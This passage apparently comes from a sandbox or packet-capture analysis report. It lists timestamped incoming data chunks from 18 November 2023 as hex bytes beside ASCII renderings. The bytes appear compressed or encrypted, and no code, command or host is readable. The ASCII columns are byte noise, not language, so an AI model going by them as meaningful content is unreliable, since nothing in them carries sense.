7a ef dd 44 45 9c a7 a2 ea af dd ed c7 e6 9a ce 53 Data Ascii: -*xYen}`'PH-<'$'y'BV]e[8(p''gCp&8eURQf-3so9n`<pxp;]c_\/X@WshE61~{'\r^45kx3DU_VgSCV\|'{s:[mzDES
2023-11-18 09:02:40 UTC	2464	IN	Data Raw: b1 15 f9 9a a3 2a f2 3b 09 f9 2d 84 fc 4f 84 7c 2f 40 3e ff 28 6e ac 80 70 a0 ec b8 93 4f fe 06 8e 38 da 0b 7c 08 8e ae d5 99 d3 72 21 14 92 6c 14 9a e4 6d e2 e7 e4 a8 77 90 09 ad 16 52 f7 9a 75 f8 b6 b2 4b ae b3 0b 96 f6 60 dc 56 76 f9 15 39 f6 bc 43 a1 90 24 9f df c5 38 a4 9c bd ff 4b 9e ed 71 18 f9 71 72 fe db 22 3f ce c8 c7 7b e0 91 72 fe 42 3f ff 30 e5 c7 1a f9 5c 0c 53 43 fe e3 83 93 e8 47 c6 81 ab cd 87 7a f4 1e 6f f6 d6 67 e7 a5 de 32 5e c4 ab 19 07 ae 4e d3 6b b2 ca 11 06 57 62 a8 ad d2 f7 49 80 51 85 61 9f 05 b0 b9 64 de 47 ff 78 4d 16 c0 fb 18 e0 ff a7 ec 69 c0 a3 28 92 9d 25 bb 9b e5 58 6f 03 44 89 c8 9f ca 9d c9 03 94 3b 51 c9 c5 27 39 64 44 b8 c0 21 18 8c 08 7a 2a 8a 3f 78 20 6c 14 bd 04 a2 9b 68 d6 4d 30 2a 3c e2 99 53 7e 02 5f fc 7b 22 04 Data Ascii: ;-O\|/@>(npO8\|r!lmwRuK`Vv9C$8Kqqr"?{rB?0\SCGzog2^NkWbIQadGxMi(%XoD;Q'9dD!z?x lhM0*<S~_{"
2023-11-18 09:02:40 UTC	2496	IN	Data Raw: e7 01 d2 d0 2b 1f 80 cb 89 84 7c 47 50 b4 23 fa 46 eb 7a f1 4c 03 44 f3 5d 00 50 03 b5 a6 bb 88 34 87 fb 7d 47 d1 4f 29 0b e9 2e 22 99 95 55 65 21 c9 45 44 e8 1f fc 0b ac 32 17 83 8b 58 a3 b9 88 65 dc 9d 80 ff 96 fa 8e 92 8b 58 88 52 1e c3 82 c7 34 29 9f 58 08 46 cc 31 c9 f5 2b 09 91 eb 27 2c ea 07 d6 d8 24 87 ca 7b 32 27 44 ae 5f 0e 36 54 69 88 bb 7e 50 3b f9 1b c7 a5 7b c1 f5 6b b7 e8 df 38 ae 89 0e a9 a1 83 b6 e3 67 9e 7d 5f f7 72 1c a6 2e d6 3b 87 f2 b8 f2 7d f4 99 3d 6e 74 b2 e4 11 6a f1 02 26 77 7e bb ff 57 1c da b3 0d 0c 6d 8b 67 28 fd b2 15 3b 11 92 03 01 64 32 4e 85 c3 db bd 3d 71 10 60 b1 2d a0 70 b4 0a cc 66 75 f8 1e c5 e2 22 ab c2 b3 8e 2a de 03 39 f4 d3 a7 62 24 0c d3 0f f3 f3 8e 64 e9 41 0a 8e d2 d0 c8 19 60 68 cc bc c6 a6 54 e6 76 c9 28 24 Data Ascii: +\|GP#FzLD]P4}GO)."Ue!ED2XeXR4)XF1+',${2'D_6Ti~P;{k8g}_r.;}=ntj&w~Wmg(;d2N=q`-pfu"*9b$dA`hTv($
2023-11-18 09:02:40 UTC	2528	IN	Data Raw: 11 50 de 2f 04 69 5e 30 9f 55 c3 70 36 19 64 22 18 11 30 2d 2d 77 ee 12 6e ab 3c c0 74 97 86 e9 56 58 57 49 62 f7 5b 14 a7 4b ec 72 e7 56 8e d7 2e 86 d7 ae 41 ce 52 70 5b e5 79 9c 07 d8 a1 44 c5 c7 36 00 5e 07 08 2f 1c 14 be 1e b0 90 41 d9 09 9f 84 a3 1f 78 87 87 c1 60 12 f8 b9 02 0c 83 e9 a7 36 f6 b7 d1 ad 3a c4 fd 89 4b 0d fa 55 27 24 df 61 ba b4 2c 19 00 e9 6e 49 28 da 8b f8 50 d8 45 80 63 b2 0e 86 74 1e b1 14 fe 8f fd c5 7c 7b e9 b7 f9 78 99 77 10 79 db de e7 77 fe bc 34 46 a5 d5 36 6b e6 13 d3 0a 91 b4 e6 b5 50 01 8d 67 7f 47 2e cb 2a 65 c5 28 fa 6e 8b d3 4e 4a 62 95 60 dd 4a 62 dd 84 cc c0 76 ff aa a9 4c 1a f7 d1 90 c1 9a ee 04 31 6a 5d 08 f5 49 0d 75 25 d1 77 f7 3b 75 e7 c6 4d 33 78 0b 9b af 33 80 3f 6b d3 c0 87 41 3d 59 ba 6d 2c e4 f9 55 c2 cc a4 Data Ascii: P/i^0Up6d"0--wn<tVXWIb[KrV.ARp[yD6^/Ax`6:KU'$a,nI(PEct\|{xwyw4F6kPgG.*e(nNJb`JbvL1j]Iu%w;uM3x3?kA=Ym,U
2023-11-18 09:02:40 UTC	2544	IN	Data Raw: 22 5e cf 6e 54 87 af 19 2f 6b f3 d6 ab a6 2f 55 be 46 ec c2 0d c2 18 2a 5a d1 5a 6c 57 dd ef 1e ea 06 c5 7b 3e 60 72 f6 1c 88 8b e6 b5 34 fb 2b c5 12 ee 7b 4a d4 df 44 b8 85 12 dc 39 5d c3 45 df 7a cf 07 e0 55 dc 4c 02 ea c9 6c b4 e2 05 73 93 b3 30 11 0c d9 33 55 99 0d c5 96 d9 3a 94 7e cd d0 fb f0 a6 14 39 d9 59 9d 4e 66 43 24 b3 9a d9 d8 fa a5 22 27 3b 0b 58 24 6e 87 a5 44 ef d5 fa 44 ef 1c ab a6 1d 0f 56 a7 68 da 51 c5 4a 89 de 31 9f 59 b5 bc 98 fa 76 2a f2 62 1a 90 85 76 46 df 2e 66 4a fa 63 da 4c 69 8e 39 53 fa f6 78 a6 9c ee 23 a5 e7 ea a2 14 0a 16 c8 91 6d 39 25 6c 98 c3 97 ed 34 b7 e5 d4 73 19 88 b7 2c e5 32 b0 8d d6 bc 2d 9f c7 ba 28 ad b6 c1 8a 1d 30 c1 b1 e9 0b 73 1c 5f 18 70 7c 4e 38 ee 8f 89 63 82 8d 6b a7 79 41 9e 61 e2 5e ba fb ce 9a 00 19 Data Ascii: "^nT/k/UFZZlW{>`r4+{JD9]EzULls03U:~9YNfC$"';X$nDDVhQJ1YvbvF.fJcLi9Sx#m9%l4s,2-(0s_p\|N8ckyAa^
2023-11-18 09:02:40 UTC	2576	IN	Data Raw: db f8 05 51 ce ba d2 3a f6 cf bb ae b4 1e 02 89 d7 61 fe 54 d7 ba d2 b0 2e 32 46 19 c6 82 fd 4e 4f e5 36 95 3f ac 75 43 44 7f bf ea a9 0c 3a f8 c3 5a c6 82 d1 64 00 b9 73 83 fd 0e 4f 55 37 9e 99 75 f0 6e 8a 93 52 4b 54 8d 75 52 e6 57 33 2f d7 a5 23 14 31 2f 97 cd 34 cf cb 16 17 ec 4b f5 97 2e d8 c6 83 2a af 6c 05 60 ca 86 03 8a 3c 95 ef 18 74 b0 89 83 dd 04 60 e1 3b d6 d1 b7 bc a3 03 d0 91 e0 e2 7e dc d2 59 81 d0 59 88 27 e8 b8 9a f5 a5 3d 7b 14 88 c3 53 d9 ca 51 72 f2 04 32 d0 c7 46 be c6 40 6c 55 3b 6b d4 fd 85 83 66 32 17 4a 18 7a f5 58 07 26 2b 4f c3 ec 87 cd 83 0e f2 4d 00 3b 45 55 14 da a6 ab ae 90 11 7c 6d b3 89 e0 65 cd 83 23 f8 06 80 b7 53 1f d6 8d 21 9e 25 8c 02 79 4a 50 6b 0c cc 65 8d 2b 18 2c 2d 94 6b af d2 d1 7f d7 41 ea a8 9e 5c e8 a6 8e 71 Data Ascii: Q:aT.2FNO6?uCD:ZdsOU7unRKTuRW3/#1/4K.*l`<t`;~YY'={SQr2F@lU;kf2JzX&+OM;EU\|me#S!%yJPke+,-kA\q
2023-11-18 09:02:40 UTC	2608	IN	Data Raw: 47 58 5a a7 a7 e4 f7 00 2e 0a 3c 38 30 72 0b ed 28 0a f4 40 81 0f 0f e4 7e 01 46 4b ab f7 e1 27 c0 b9 03 da 5d 43 3e 29 ab 1b 51 ae 8b 28 6b eb af 58 59 5d 07 5a 5a 1a d9 0d b0 7b 49 2c b1 ef f9 8c 99 1c 93 5c 7c 69 ba e2 e2 ef b5 61 84 df 06 61 ba 2f 1e 2d 37 a7 4c f8 91 c6 7f 8d fc 2e 06 a9 22 18 cb 7e 54 07 f2 df 2f 8e 41 05 19 97 c5 82 33 80 e0 fc 61 71 64 51 36 bd 34 96 8a d2 4a d5 99 bb 38 86 51 2b c9 e2 db 7c 83 b7 45 ae 08 75 e1 3f e5 48 51 64 2c b3 08 79 4e 64 21 e3 17 2e 31 85 6b fa 81 08 f7 fe 5d 91 48 1c fd 14 af 2e aa 65 2e e8 16 cf a3 d7 e1 47 a4 d6 55 8d 2e 3a 28 99 53 d0 53 de d3 65 18 ea 24 40 32 ff 99 59 2b c6 d0 a2 c9 08 a2 b6 92 71 89 5a 66 0d c8 46 15 44 de 11 b4 12 f7 eb 95 9e 67 62 05 8b f7 ba f4 70 e7 09 52 2f c2 f6 d4 7a d6 3c 6e Data Ascii: GXZ.<80r(@~FK']C>)Q(kXY]ZZ{I,\\|iaa/-7L."~T/A3aqdQ64J8Q+\|Eu?HQd,yNd!.1k]H.e.GU.:(SSe$@2Y+qZfFDgbpR/z<n
2023-11-18 09:02:40 UTC	2640	IN	Data Raw: d5 1a 01 1c c9 f1 e4 8a e9 72 40 e9 a4 c5 ae 68 d0 d8 d7 83 c1 48 e7 52 fb d5 5c a8 2a 9a 54 a8 4f d8 52 22 6c bd d8 ff 5b 09 fb 7f 76 41 58 f8 a9 6c 9f 22 fb eb 11 cb 33 2a 2c d3 6b e9 74 39 c3 d2 a8 99 4b 59 d5 17 8a e5 d3 76 7d 2c 2b 09 cb 63 22 e6 3d 1f fc bf 76 63 14 d5 34 cb ae af 9a 04 a8 0f c5 fe 3f 80 32 2a a0 f8 8a 10 bf 35 cd af 59 18 a6 ef 05 66 f9 85 e0 c0 4f 9f ec b7 4a 5c 59 7d a0 2b a3 07 eb 30 27 30 db 05 91 d6 26 56 3a 8e 85 6e 13 60 e7 59 ef f1 47 cc 8a 38 0e d9 5d 8f b2 8b 8f 30 cd 6b 2c fb fa 3d d1 44 79 fe b7 da 3e e2 5e b9 e3 68 c1 8c c2 33 37 68 30 40 80 7a db 75 dc 57 8a 63 f4 f3 31 b6 f2 31 2a a7 9c 1e 7c cd ca eb d9 99 f8 c0 59 13 1f 6f a2 18 46 53 b0 89 27 44 71 bb 19 6d 9c 70 06 34 15 c8 0c 88 4f e0 0c 68 18 20 9f 79 e8 b7 82 Data Ascii: r@hHR\TOR"l[vAXl"3,kt9KYv},+c"=vc4?25YfOJ\Y}+0'0&V:n`YG8]0k,=Dy>^h37h0@zuWc11\|YoFS'Dqmp4Oh y
2023-11-18 09:02:40 UTC	2672	IN	Data Raw: c7 73 81 be 4e 15 d6 91 ef 76 b8 3d e5 7c 8c 5d f0 2c 1a dc 96 51 4a 4f c9 9a 13 75 78 56 6e fe d7 bc 22 df ee 9b a3 d4 26 0f f4 d8 06 d3 2c ce 31 2c 12 ba 5d af 86 4f d4 e0 6b 3c 4c 1e 87 55 b9 85 d2 29 85 9e 1d 67 74 fd f4 d1 0f 36 85 4c 62 4c e3 8a 40 1a 86 02 83 6c 6f 10 f7 2b 00 b7 b9 be 16 48 15 c7 2d de d5 3f 1a d0 61 2d a0 ab 65 40 98 0b 3a c3 9d 9d 28 65 b7 ba b3 53 a4 ec 26 77 b6 55 ca 6e 76 a3 11 b3 54 10 9c 2b 27 ff 0a 2f 63 1e 4c e1 bb 21 29 54 6e 87 f4 b5 ef 94 d9 9d 1b 10 cf 35 9a da e9 05 40 87 f4 b9 ef a4 d9 9d 1d 10 db 3d 53 8f d0 6f ad 9e 9b 47 b3 0a c7 7d df 62 85 3e c9 d9 6e 82 1c 63 04 d3 b4 fc 0f 30 ad 54 41 87 29 7f 27 29 d7 58 2c 98 05 41 ae ba 5d 30 e3 83 b4 dd 64 16 e4 84 7c e1 49 14 5e 71 5d 16 ea 9e b6 23 a1 28 50 4e 20 94 74 Data Ascii: sNv=\|],QJOuxVn"&,1,]Ok<LU)gt6LbL@lo+H-?a-e@:(eS&wUnvT+'/cL!)Tn5@=SoG}b>nc0TA)')X,A]0d\|I^q]#(PN t
2023-11-18 09:02:40 UTC	2688	IN	Data Raw: d6 07 05 3a 59 ff 1d 50 d5 84 bd f9 c1 0b bb 2e c1 fa 3b 0c a3 8b 88 a9 c4 4a fa f8 41 a9 c7 ef 31 34 79 d5 a2 49 6f 2c 75 11 7d 08 9e bf 68 f9 1c 42 cc a2 32 26 1a b3 7c 8e 15 33 46 a2 49 69 f9 bc 37 3c 4f 4c 10 b0 60 41 b7 99 09 1e 3b 64 7c 65 e0 82 ee 73 7d e6 83 08 27 97 57 91 21 d2 c7 53 27 67 88 cf 15 b7 38 62 7a 23 1c 31 8d e6 b0 bd 1a f6 3e 69 fe 47 fd 68 9b a8 fb be 30 df 18 27 01 c7 1b eb f0 78 63 03 1e 6f ac c5 e3 8d 7e 31 4e c2 55 0b 87 6b 57 90 27 7e 5b 2b 9c b0 75 d5 1e 20 9f 06 57 1d 3b f5 d8 a0 9f 7a 24 b2 58 8b 25 4b c0 93 b6 b4 81 87 51 cd f9 8b aa d2 73 f0 de 2b 43 d6 5c e3 f5 04 87 3c 3b 99 86 92 61 84 de b4 02 e0 be 9f f6 ba 16 3f 88 4e 9b c4 7e 2e bd ec 84 54 77 b6 40 5b 80 6d 87 d1 3e a2 ca 72 28 97 26 ca a6 53 81 7f 19 cf 64 f3 1a Data Ascii: :YP.;JA14yIo,u}hB2&\|3FIi7<OL`A;d\|es}'W!S'g8bz#1>iGh0'xco~1NUkW'~[+u W;z$X%KQs+C\<;a?N~.Tw@[m>r(&Sd
2023-11-18 09:02:40 UTC	2720	IN	Data Raw: 3b 2c 2b ab b1 a9 0e c7 8e b5 6c 75 57 ef b8 c7 f4 c5 33 81 2f 06 1a be b8 8d d5 2b 80 2f e4 64 4a f1 bc ac d1 74 4a e9 4e 47 63 e9 94 3e 64 fb 0a 04 22 96 bd ba e9 76 f9 94 fe fa aa a5 59 19 bf 36 b4 d0 de 57 1b ef 1e 69 3d c1 0e f9 66 ba dc 21 29 d4 21 17 a8 43 3e 10 f3 ff 54 98 ff a7 63 92 2d 70 aa 52 f7 ce 20 bd 81 0f a2 34 3e e1 d7 7b 93 a2 75 8e d5 83 d3 40 4f a8 f7 0e 8d 55 8b c4 63 0f 75 69 4c 83 86 8f bd d5 a7 c5 63 1f 35 55 3c f6 55 df bc 9b ea 0e 22 06 eb c5 b2 71 e7 8c 20 43 db 91 57 ec 33 3e b3 25 16 9c 66 3e e4 b9 dd b3 4a a3 79 62 29 de d8 fb 47 c2 9c 5b c6 49 45 6d 20 16 7b b8 9c e2 31 fd 83 a8 90 11 50 a2 77 71 31 78 dd 18 ba 78 fe 48 83 36 22 2e 48 55 4a 58 17 97 c4 2b e5 19 25 88 37 96 67 53 e5 5f 84 41 4b 28 67 0c 78 7b 88 f4 56 a5 06 Data Ascii: ;,+luW3/+/dJtJNGc>d"vY6Wi=f!)!C>Tc-pR 4>{u@OUcuiLc5U<U"q CW3>%f>Jyb)G[IEm {1Pwq1xxH6".HUJX+%7gS_AK(gx{V
2023-11-18 09:02:40 UTC	2752	IN	Data Raw: fb ca 28 8c 9a a3 b0 64 4d 70 0a 7d 44 e1 4c a2 b0 35 50 38 7d 0d 1d 94 4a 89 2b f1 b7 ca f5 45 18 1c d3 ed be 6a 4e 4b cb 3b a3 ac 2f 2c c1 74 b6 5b 0c d4 54 11 35 bf 13 35 6e a2 66 da 2b 8c 9a c0 6b a8 b3 e5 e3 f6 48 4b be 96 a9 32 f3 66 4d 33 d3 78 63 40 27 81 37 20 bc 61 8a 45 bd 4b d2 16 71 7c 80 c2 1d 9a 62 cf 60 b2 41 ec 13 8d 95 46 cd 15 b2 74 60 a4 c4 57 d8 3f 83 c6 d5 67 6e e8 3d ef f5 c7 d5 86 ca 0e 1f b1 a7 42 18 6b 8a 85 89 ab 1c 10 ab c7 dc 82 0d ab 83 f7 67 94 9b b7 e0 46 6a c1 de ab 58 0b 6e 5b 0d 67 e6 8a 83 80 d9 66 00 73 ca 00 66 13 81 39 bd 12 b2 38 ac c6 0d 68 32 e6 a3 c3 99 2d 5f b1 ad 88 66 ed ca 1b 50 16 01 17 bc c9 db 8d 61 bc 01 b0 d4 93 f8 8b 23 e8 09 82 f8 a3 1f ef ca 69 92 03 cf 93 28 bb 2a 59 12 92 5e 59 f1 a9 86 1a 09 e3 0f Data Ascii: (dMp}DL5P8}J+EjNK;/,t[T55nf+kHK2fM3xc@'7 aEKq\|b`AFt`W?gn=BkgFjXn[gfsf98h2-_fPa#i(*Y^Y
2023-11-18 09:02:40 UTC	2784	IN	Data Raw: 69 a5 67 0d b1 6e 76 97 23 7f 15 69 c6 87 df e9 81 cf 6c fa a6 3e 38 fd e3 88 1f ee 74 b2 29 7d aa 9c 4d 76 b4 36 80 26 49 dc e2 9a 41 f2 46 48 8d cd e4 ce af a7 d5 09 7c 69 7a ea cf f6 3f 12 65 72 fa 1c a8 88 7e 4e 88 e2 11 45 7a 9e a4 ff e4 bf fe ea 53 5c 3a a0 48 6b 92 74 c0 24 bd 40 d2 13 7f f9 6f bf c1 a5 83 8a f4 a9 55 43 3a 68 92 5e 24 69 18 b8 b8 b4 a6 48 1f 94 a4 35 93 74 81 a4 7d 92 74 48 91 fe bc 24 1d 32 49 2f 59 48 87 15 e9 b0 24 1d 36 49 17 2d a4 23 8a f4 5b 1f 1a d2 11 93 f4 32 97 d6 0c e9 a8 22 3d 22 49 47 0d 69 8d 56 6d 33 fd 45 3f ae 44 b3 70 33 9c 4d e9 37 be 79 f8 c6 c1 dc 66 9e 37 41 4f 07 e8 17 d6 2d 9b f3 fa 61 be 42 da fc 1a f1 04 88 27 00 3c 0b 32 4f 40 f0 04 89 27 08 3c 8b 32 4f 50 f0 68 c4 a3 01 4f 41 e6 d1 04 4f 88 78 42 c0 b3 Data Ascii: ignv#il>8t)}Mv6&IAFH\|iz?er~NEzS\:Hkt$@oUC:h^$iH5t}tH$2I/YH$6I-#[2"="IGiVm3E?Dp3M7yf7AO-aB'<2O@'<2OPhOAOxB
2023-11-18 09:02:40 UTC	2800	IN	Data Raw: d5 36 48 b4 0d 9a 62 43 5a 6c 08 89 0d 11 b1 21 aa 6d 88 68 1b 32 c5 86 b5 d8 30 12 1b 26 62 c3 54 db 30 d1 56 1c 48 68 e1 07 12 1a 52 f4 34 02 8f 97 9c f8 64 0b ff 4f 7e e8 83 7d ae 4a 45 3c 04 f1 f4 cf 71 7c af d4 f1 bd 6a 0d c4 b7 e8 5a 6e 24 92 b6 50 49 4f 7b 4b fa f0 eb a6 a4 b9 ae 4e e6 dd 1d e8 85 9c 74 32 4d 90 47 58 22 8c 2d 62 9d 0c 4b 94 3d 8b 58 46 89 e3 57 80 66 f5 0a d0 24 72 46 93 4a 2c bc 23 ea 68 c2 b9 45 d2 89 de c7 18 38 cb 5e 4a 8c 69 9b c4 cf 7c 42 8d 69 65 11 b8 cb 10 6f 66 1a f1 9b 7b 4c f4 5f c6 c0 59 f6 73 a8 91 5a 77 23 b5 ae 67 30 f3 8e f8 6d 36 e2 73 3d 89 0f 37 e2 73 37 e2 b3 3c 89 8f 3c 89 cf 6c c4 ef 7a 12 3f 6e c4 6f 36 22 3a 55 73 38 2d 7b 5f a5 82 7a 05 10 dd ab 39 50 97 fd b0 22 0e 60 e2 a0 5b 72 50 13 07 31 71 c8 2d 39 Data Ascii: 6HbCZl!mh20&bT0VHhR4dO~}JE<q\|jZn$PIO{KNt2MGX"-bK=XFWf$rFJ,#hE8^Ji\|Bieof{L_YsZw#g0m6s=7s7<<lz?no6":Us8-{_z9P"`[rP1q-9
2023-11-18 09:02:40 UTC	2832	IN	Data Raw: bd 93 e8 3d f6 b0 a0 ec cd 42 6f 88 de ea 40 6f d0 e2 96 e8 15 d1 6b 15 f4 0a 55 6b 89 5e 48 f4 12 7b 58 50 96 66 a1 67 44 cf 75 a0 67 68 71 4e f4 84 e8 a9 0a 7a 82 aa a9 44 8f 24 7a 8c 3d 2c 28 e3 1f 5f f7 07 98 f9 3e 1f 70 f6 43 1d b3 1f 60 52 43 ce be c7 d9 f7 55 66 df 43 55 5f ce be 23 67 df c5 1e 16 94 ae 59 df f0 2d a2 db 3a d0 2d b4 d8 26 ba 41 74 53 05 dd 40 55 53 a2 6b 12 5d c7 1e 16 94 ba 59 e8 0a d1 55 1d e8 0a 5a ac 12 5d 22 ba ac 82 2e a1 aa 2c d1 05 89 2e 62 0f 0b 4a d1 2c 74 8e e8 bc 0e 74 0e 2d e6 89 ce 10 9d 55 41 67 50 95 95 e8 94 44 a7 b1 87 05 25 6d 16 3a 41 74 52 07 3a 81 16 93 44 c7 88 8e ab a0 63 a8 8a 4b 74 44 a2 a3 d8 c3 82 12 fd 7a 9f 9b fa 3e 0f 71 f6 61 1d b3 0f 61 52 61 ce 3e c0 d9 07 55 66 1f 40 55 50 ce de 27 67 ef c7 1e 16 Data Ascii: =Bo@okUk^H{XPfgDughqNzD$z=,(_>pC`RCUfCU_#gY-:-&AtS@USk]YUZ]".,.bJ,tt-UAgPD%m:AtR:DcKtDz>qaaRa>Uf@UP'g
2023-11-18 09:02:40 UTC	2864	IN	Data Raw: 7f fe fe 67 ef db f7 7e fd f6 2c 2a 1e e9 bd c0 fb 08 ef e5 bb 9b 6e dd 38 09 cb d9 80 fe 04 fd 59 54 1c a8 3f 42 7f 80 fe e8 f0 69 6b a2 fb bd 01 af 06 ef 5e 54 ec e8 55 e1 dd c1 ab 3a dc bb 11 dd 6f 0d 78 37 f0 6e 45 c5 8a de 35 bc 2b 78 d7 0e f7 2e 44 f7 4b 03 de 05 bc 4b 51 31 a3 77 0e ef 0c de b9 c3 bd 13 d1 fd d4 80 77 02 ef 54 54 8c e8 1d c3 3b 82 77 ec aa b7 d7 40 58 86 06 f4 03 e8 87 a2 a2 47 7d 1f fa 1e f4 7d 87 4f bb 23 ba ef 1a f0 76 e0 ed 8a 8a 16 bd 6d 78 5b f0 b6 1d ee 6d 88 ee 9b 06 bc 0d 78 9b a2 a2 46 6f 1d de 1a bc 75 87 7b 2b a2 fb aa 01 6f 05 de aa a8 28 d1 5b 86 b7 04 6f d9 e1 de 82 e8 be 68 c0 5b 80 b7 28 2a 72 f4 e6 e1 cd c1 9b 77 d5 db 2b 23 2c 59 03 fa 0c f4 59 51 91 a2 3e 0d 7d 0a fa b4 c3 a7 9d 10 dd 27 0d 78 13 f0 26 45 45 8c Data Ascii: g~,n8YT?Bik^TU:ox7nE5+x.DKKQ1wwTT;w@XG}}O#vmx[mxFou{+o([oh[(rw+#,YYQ>}'x&EE
2023-11-18 09:02:40 UTC	2880	IN	Data Raw: f5 7c fd 76 c3 3f 5e cb 99 ac d7 26 67 b2 52 f5 74 ad cf 64 bd 96 1b fe c8 1e 0b 7c 76 e6 4c 56 41 1f 6c a0 f7 b4 78 b8 96 33 59 05 bd 33 41 6f a9 da 5d cb 0d bf d6 37 fc 86 3d 16 8c 8d 53 e8 a5 a0 57 36 d0 4b 5a 5c c9 a4 e7 82 5e 98 a0 e7 54 2d f4 a4 a7 7a d2 33 f6 58 30 66 4e a1 c7 82 9e d8 40 8f 69 71 22 93 1e 0a 7a 64 82 1e 52 35 d2 93 ee eb 49 0f d8 63 c1 18 38 85 ee 0a ba 67 03 dd a5 c5 9e 4c ba 2d e8 8e 09 ba 4d 55 47 4f ba a9 27 dd 62 8f 05 3e bf 3f cf 9d 7b 9e d7 65 f6 0d 1b b3 af 33 a9 86 dc f0 57 32 fb 9a c9 ec af a8 aa e9 1b fe 52 df f0 55 f6 58 30 aa 4e dd f0 65 41 57 6c a0 cb b4 58 91 1b be 28 e8 92 09 ba 48 55 49 df f0 79 7d c3 17 d8 63 81 cf ce 9c c9 2a e8 9c 0d f4 05 2d e6 64 d2 19 41 67 4d d0 19 aa b2 7a d2 e7 7a d2 69 f6 58 30 d2 4e a1 Data Ascii: \|v?^&gRtd\|vLVAlx3Y3Ao]7=SW6KZ\^T-z3X0fN@iq"zdR5Ic8gL-MUGO'b>?{e3W2RUX0NeAWlX(HUIy}c*-dAgMzziX0N
2023-11-18 09:02:40 UTC	2912	IN	Data Raw: c8 d7 94 5d 94 fb eb 0e ca fd f5 ff 04 09 fb eb 5b 31 8a fd f5 53 bb 28 32 38 a5 3b 3d cb e0 54 9f 4a ce 7c f8 05 c1 a7 cf 30 e8 7a 4e 66 06 dd b7 1f ab 66 70 46 ed 34 97 c1 09 da 69 2e 83 d3 f1 63 b2 1d c1 60 c7 61 b0 23 7e 12 63 c7 a3 29 ba 19 9c b4 1d 86 33 38 63 77 50 67 70 5e d1 79 ba 34 81 63 dd 61 f4 b3 16 65 ee c6 95 4d 93 bb c9 c8 d6 db 0f 05 4b f6 3f d9 c6 31 5d 44 b0 32 ff 81 df ae 9b 3a f8 57 96 11 2f f0 95 a1 02 3f 02 50 e2 20 8d d6 bd 59 e6 40 d6 b4 2c 2a 90 15 42 04 59 29 93 a5 43 f6 09 ac f7 5d 60 c8 3e 81 21 fb e3 87 cc 90 ed 32 19 b7 47 6d d4 5e ca 34 0a b2 a0 48 d4 14 bd 22 51 24 90 35 bd 1b 01 64 91 8b 44 a9 82 ac 50 25 c8 6a 94 49 5b 22 aa 7c 3b 35 c8 ca db 4e 79 0e 32 54 bd 44 94 0e c8 3a dc dd 78 89 a8 50 25 c8 aa bd 9d 1a 64 85 ca Data Ascii: ][1S(28;=TJ\|0zNffpF4i.c`a#~c)38cwPgp^y4caeMK?1]D2:W/?P Y@,*BY)C]`>!2Gm^4H"Q$5dDP%jI["\|;5Ny2TD:xP%d
2023-11-18 09:02:40 UTC	2944	IN	Data Raw: 76 8c 49 78 95 e6 3d 9f f8 cb d9 20 46 79 34 60 8c df 41 60 9b 9c 64 bb 7b a2 12 03 7c ce 50 39 20 fa d4 3d 78 aa a4 eb d0 02 9f b2 53 59 57 0a bf 67 d7 73 87 70 89 be 2b 59 9c ce 10 7b 66 83 c7 c5 0b 88 9e 4f d0 ab 67 42 91 80 7e 6b c7 77 43 3a 6b b2 53 36 81 2f 5d 3a f3 f8 67 ec 9a c7 d8 75 2d 63 57 b3 49 af 95 bf 22 3f a0 cd 80 79 f3 8b 7d 94 e3 b5 66 2b bd f2 45 81 95 b9 da c1 5c a2 84 4f b1 ad 3c 7d 51 13 b3 e4 5d 9f 21 4b 6b 58 4b d9 c8 66 1b 68 36 d2 42 a0 5d 3a f7 49 f4 93 e0 50 f3 65 b1 98 e5 30 41 07 50 0d fc e3 2c 3e d5 9a d0 60 14 e9 50 2b dc 26 d8 0a 5f e1 00 2f 11 fa 79 e9 13 fe 76 a1 44 7c bb 2f e4 b1 b7 9b 99 92 cb 62 d5 30 e4 e8 c9 4e 20 5c 32 8d 16 53 40 55 05 77 c2 ec 8d bf e5 0f 04 dd 13 d5 81 42 b3 53 e8 9b dc 61 fc 26 f1 fa e2 be 65 Data Ascii: vIx= Fy4`A`d{\|P9 =xSYWgsp+Y{fOgB~kwC:kS6/]:gu-cWI"?y}f+E\O<}Q]!KkXKfh6B]:IPe0AP,>`P+&_/yvD\|/b0N \2S@UwBSa&e
2023-11-18 09:02:40 UTC	2960	IN	Data Raw: 4f 25 29 8a b1 a1 87 bc 6a ea 88 9c d0 8c 0a 98 2f e9 5e d7 f9 bc fa 7c 2d 17 c0 a0 cb dc 07 1d fa 48 ba 15 f7 40 aa fb c7 fe c2 76 91 c9 ed 12 93 db ad 4c 1e e5 3e e9 34 7d 52 ee 2d ea 8e ff 08 4c 56 78 bb b2 c0 8d c9 d3 dd 41 f7 fe 88 32 a6 c8 4c 6e ef 88 c9 13 fb ba 32 79 99 fb 7c 4b 96 73 26 7f eb 3e e8 d9 e5 12 93 7f 39 d7 b9 48 36 5e 34 20 f5 4b 2c 7d 85 ff 60 5c 2e fd 9b f0 db fc 9e 6d 99 c8 da 2c df b2 f0 7d 07 5b 0f 29 af 50 c6 77 ad 5a c9 e4 26 4f c9 64 d5 43 36 63 df 0a 4d 93 4e 22 97 55 0a 65 6a b8 a7 cb f8 90 9c 31 47 7a 51 0d 8d 4a 4c dc 02 81 98 b8 05 56 62 e2 16 d8 89 89 5b e0 46 8c 94 d1 65 7c a3 8d 18 ff 6a 1b 31 77 7c d9 29 62 1e 4c 11 7c 4b 05 0e c7 03 dc 3d 53 fa 39 77 2f 08 7a d6 fc 3a 35 5a 14 ad 89 5d 0c b3 ef 7f bf b1 be ea 4e 32 Data Ascii: O%)j/^\|-H@vL>4}R-LVxA2Ln2y\|Ks&>9H6^4 K,}`\.m,}[)PwZ&OdC6cMN"Uej1GzQJLVb[Fe\|j1w\|)bL\|K=S9w/z:5Z]N2
